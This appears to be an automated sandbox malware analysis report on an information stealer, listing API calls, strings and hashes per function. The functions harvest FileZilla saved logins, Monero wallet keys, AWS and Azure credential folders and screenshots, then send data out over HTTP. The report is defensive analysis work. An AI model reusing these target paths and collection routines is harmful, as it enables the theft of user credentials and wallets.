                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00870562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00870571
                        • lstrcat.KERNEL32(?,url: ), ref: 00870580
                        • lstrcat.KERNEL32(?,00000000), ref: 00870593
                        • lstrcat.KERNEL32(?,00881678), ref: 008705A2
                        • lstrcat.KERNEL32(?,00000000), ref: 008705B5
                        • lstrcat.KERNEL32(?,0088167C), ref: 008705C4
                        • lstrcat.KERNEL32(?,login: ), ref: 008705D3
                        • lstrcat.KERNEL32(?,00000000), ref: 008705E6
                        • lstrcat.KERNEL32(?,00881688), ref: 008705F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00870604
                        • lstrcat.KERNEL32(?,00000000), ref: 00870617
                        • lstrcat.KERNEL32(?,00881698), ref: 00870626
                        • lstrcat.KERNEL32(?,0088169C), ref: 00870635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00880DB2), ref: 0087068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: c03728c1a2f9e2c962cf21609d0a15d2d4eeebfe899832c351f3171819f76fc8
                        • Instruction ID: 073ddb67db184c524a1b8bd213747d9e6cdfd31f7df309311a87d51890b004f4
                        • Opcode Fuzzy Hash: c03728c1a2f9e2c962cf21609d0a15d2d4eeebfe899832c351f3171819f76fc8
                        • Instruction Fuzzy Hash: 46D10F719001099BCB08EBF8DD96DEE7778FB54700F448518F116E6199EF34EA46CB62
                        Function 00865960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008659F8
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 00865A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00865B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0116ED98,00000000,?,0116A9E8,00000000,?,00881A1C), ref: 00865E71
                        • lstrlen.KERNEL32(00000000), ref: 00865E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00865E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00865E9A
                        • lstrlen.KERNEL32(00000000), ref: 00865EAF
                        • lstrlen.KERNEL32(00000000), ref: 00865ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00865EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 00865F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00865F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00865F4C
                        • InternetCloseHandle.WININET(00000000), ref: 00865FB0
                        • InternetCloseHandle.WININET(00000000), ref: 00865FBD
                        • HttpOpenRequestA.WININET(00000000,0116EDA8,?,0116E750,00000000,00000000,00400100,00000000), ref: 00865BF8
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • InternetCloseHandle.WININET(00000000), ref: 00865FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: ba03ac144b5aa7c9d4a95143c60b98ec366fb06883dc6acae8e1c6c5098afee8
                        • Instruction ID: ed2bebc3df0acc361e623ae80c658578e6d4856326882d629f8ef20f698da332
                        • Opcode Fuzzy Hash: ba03ac144b5aa7c9d4a95143c60b98ec366fb06883dc6acae8e1c6c5098afee8
                        • Instruction Fuzzy Hash: 3D12F171820118ABDB19EBA4DC95FEEB378FF54700F508169B11AE2095DF706A4ACF53
                        Function 0086CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 00878B60: GetSystemTime.KERNEL32(00880E1A,0116ABF8,008805AE,?,?,008613F9,?,0000001A,00880E1A,00000000,?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 00878B86
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0086CF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0086D0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0086D0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D208
                        • lstrcat.KERNEL32(?,00881478), ref: 0086D217
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D22A
                        • lstrcat.KERNEL32(?,0088147C), ref: 0086D239
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D24C
                        • lstrcat.KERNEL32(?,00881480), ref: 0086D25B
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D26E
                        • lstrcat.KERNEL32(?,00881484), ref: 0086D27D
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D290
                        • lstrcat.KERNEL32(?,00881488), ref: 0086D29F
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D2B2
                        • lstrcat.KERNEL32(?,0088148C), ref: 0086D2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 0086D2D4
                        • lstrcat.KERNEL32(?,00881490), ref: 0086D2E3
                          • Part of subcall function 0087A820: lstrlen.KERNEL32(00864F05,?,?,00864F05,00880DDE), ref: 0087A82B
                          • Part of subcall function 0087A820: lstrcpy.KERNEL32(00880DDE,00000000), ref: 0087A885
                        • lstrlen.KERNEL32(?), ref: 0086D32A
                        • lstrlen.KERNEL32(?), ref: 0086D339
                          • Part of subcall function 0087AA70: StrCmpCA.SHLWAPI(01169518,0086A7A7,?,0086A7A7,01169518), ref: 0087AA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 0086D3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 9d87d5a5cba43458b06957e556bbb9358ee3b206b34518c18842842e577116d0
                        • Instruction ID: 060f390fccc4c0f9d3046b5faddf913f68d94ef5860c3a572f8d720e96d722b7
                        • Opcode Fuzzy Hash: 9d87d5a5cba43458b06957e556bbb9358ee3b206b34518c18842842e577116d0
                        • Instruction Fuzzy Hash: FCE1ED71910109ABCB08EBE4DD96EEE7378FF64301F108168F51AE6195DF35AA06CB63
                        Function 0086C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 0087A920: lstrcpy.KERNEL32(00000000,?), ref: 0087A972
                          • Part of subcall function 0087A920: lstrcat.KERNEL32(00000000), ref: 0087A982
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0116D950,00000000,?,0088144C,00000000,?,?), ref: 0086CA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0086CA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0086CA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0086CAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0086CAD9
                        • StrStrA.SHLWAPI(?,0116D9F8,00880B52), ref: 0086CAF7
                        • StrStrA.SHLWAPI(00000000,0116DA28), ref: 0086CB1E
                        • StrStrA.SHLWAPI(?,0116E078,00000000,?,00881458,00000000,?,00000000,00000000,?,01169398,00000000,?,00881454,00000000,?), ref: 0086CCA2
                        • StrStrA.SHLWAPI(00000000,0116E2F8), ref: 0086CCB9
                          • Part of subcall function 0086C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0086C871
                          • Part of subcall function 0086C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0086C87C
                        • StrStrA.SHLWAPI(?,0116E2F8,00000000,?,0088145C,00000000,?,00000000,01169468), ref: 0086CD5A
                        • StrStrA.SHLWAPI(00000000,01169678), ref: 0086CD71
                          • Part of subcall function 0086C820: lstrcat.KERNEL32(?,00880B46), ref: 0086C943
                          • Part of subcall function 0086C820: lstrcat.KERNEL32(?,00880B47), ref: 0086C957
                          • Part of subcall function 0086C820: lstrcat.KERNEL32(?,00880B4E), ref: 0086C978
                        • lstrlen.KERNEL32(00000000), ref: 0086CE44
                        • CloseHandle.KERNEL32(00000000), ref: 0086CE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: e3f6d07d52772a28e09a6025c0c11d11bfa486b1950729c7f13f8ea4a307974c
                        • Instruction ID: 1e8f3c4daa0319820f857b25083e9228945b35430bcee74d6f2fc1a0a66fecd3
                        • Opcode Fuzzy Hash: e3f6d07d52772a28e09a6025c0c11d11bfa486b1950729c7f13f8ea4a307974c
                        • Instruction Fuzzy Hash: 74E11271800109ABDB19EBA4DC95FEEB778FF54300F008169F51AE6195DF34AA4ACB63
                        Function 00878320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • RegOpenKeyExA.ADVAPI32(00000000,0116B920,00000000,00020019,00000000,008805B6), ref: 008783A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00878426
                        • wsprintfA.USER32 ref: 00878459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0087847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0087848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00878499
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: e0c25b46609d05120503ddb1dc4780a7689a12ebd5ebc14f980f7b19b544dc79
                        • Instruction ID: 23c4277d34e4b3c3d07ca6caeba01401a380d59c4288a312702707f4e4f3c8be
                        • Opcode Fuzzy Hash: e0c25b46609d05120503ddb1dc4780a7689a12ebd5ebc14f980f7b19b544dc79
                        • Instruction Fuzzy Hash: 1F810D71910118ABDB68DB54CC95FEE77B8FF58700F00C298E11AA6184DF75AB86CF92
                        Function 00874D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00878DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00878E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00874DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 00874DCD
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 0087492C
                          • Part of subcall function 00874910: FindFirstFileA.KERNEL32(?,?), ref: 00874943
                        • lstrcat.KERNEL32(?,00000000), ref: 00874E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 00874E59
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FDC), ref: 00874971
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,00880FE0), ref: 00874987
                          • Part of subcall function 00874910: FindNextFileA.KERNEL32(000000FF,?), ref: 00874B7D
                          • Part of subcall function 00874910: FindClose.KERNEL32(000000FF), ref: 00874B92
                        • lstrcat.KERNEL32(?,00000000), ref: 00874EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00874EE5
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 008749B0
                          • Part of subcall function 00874910: StrCmpCA.SHLWAPI(?,008808D2), ref: 008749C5
                          • Part of subcall function 00874910: wsprintfA.USER32 ref: 008749E2
                          • Part of subcall function 00874910: PathMatchSpecA.SHLWAPI(?,?), ref: 00874A1E
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,0116EE98), ref: 00874A4A
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,00880FF8), ref: 00874A5C
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,?), ref: 00874A70
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,00880FFC), ref: 00874A82
                          • Part of subcall function 00874910: lstrcat.KERNEL32(?,?), ref: 00874A96
                          • Part of subcall function 00874910: CopyFileA.KERNEL32(?,?,00000001), ref: 00874AAC
                          • Part of subcall function 00874910: DeleteFileA.KERNEL32(?), ref: 00874B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 29ee20e837e2989f4959644b228f8e5dee054a6c5f994525032e2f3b997c64b5
                        • Instruction ID: 62d3c4a83dee4199732342bcc367922a01b1006912664bcb8f0be5d41c2b738d
                        • Opcode Fuzzy Hash: 29ee20e837e2989f4959644b228f8e5dee054a6c5f994525032e2f3b997c64b5
                        • Instruction Fuzzy Hash: 4341607A94020466CB54F760DC8BFED7678FB64700F004454B29AE61C5EEB89B8ACB93
                        Function 00879010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0087906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateGlobalStream
                        • String ID: image/jpeg
                        • API String ID: 2244384528-3785015651
                        • Opcode ID: 955d1d4a3eda1b7cb55b65707605b4ff07c2f5ca42e45f48413641ddfdf5bf20
                        • Instruction ID: 6a0ff4457fd288af608d60ee8b8ff7b1f4bdf511965e3926438ef34fa0a91c2e
                        • Opcode Fuzzy Hash: 955d1d4a3eda1b7cb55b65707605b4ff07c2f5ca42e45f48413641ddfdf5bf20
                        • Instruction Fuzzy Hash: DB71CB75910209ABDB04EBE4DC89FEEB7B8FB58700F148518F516E7294DB34E905CB62
                        Function 00872E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • ShellExecuteEx.SHELL32(0000003C), ref: 008731C5
                        • ShellExecuteEx.SHELL32(0000003C), ref: 0087335D
                        • ShellExecuteEx.SHELL32(0000003C), ref: 008734EA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmpDownload File
